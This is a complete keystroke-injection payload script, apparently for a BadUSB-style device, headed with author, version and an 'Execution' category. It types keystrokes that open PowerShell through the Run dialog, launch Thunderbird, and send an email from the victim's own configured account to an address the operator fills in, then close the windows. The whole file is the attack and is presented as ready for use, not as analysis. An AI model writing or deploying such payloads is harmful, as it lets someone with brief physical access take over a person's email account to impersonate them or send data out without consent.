* ########################################################
* #                                                      |
* # Title        : Send Email Through Thunderbird        |
* # Author       : Aleff                                 |
* # Version      : 1.0                                   |
* # Category     : Execution                             |
* # Target       : Windows 10/11 - Linux(debian tested)  |
* #                                                      |
* ########################################################


* Requirements:
*     - Internet Connection
*     - Thunderbird installed and email configured
*     - ExecutionPolicy Bypass (for Windows target)

* This payload is tested on:
*     - Ubuntu 23.04
*     - Windows 11


* # PowerShell
QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 2000
QUACK STRING Start-Process "thunderbird.exe"
QUACK ENTER
QUACK DELAY 4000

* # Thunderbird
QUACK CTRL n
QUACK DELAY 2000

* REQUIRED - Set receiver email address
QUACK STRING EMAIL-ADDRESS
QUACK DELAY 500
QUACK TAB
QUACK DELAY 500
QUACK TAB
QUACK DELAY 500

* REQUIRED - Set email Subject
QUACK STRING SUBJECT
QUACK DELAY 500
QUACK TAB
QUACK DELAY 500

* REQUIRED - Set email message
QUACK STRING MESSAGE
QUACK DELAY 500
QUACK CTRL ENTER
QUACK DELAY 2000
QUACK ENTER

* # End actions
QUACK DELAY 2000
QUACK ALT F4
QUACK DELAY 1000
QUACK ALT F4
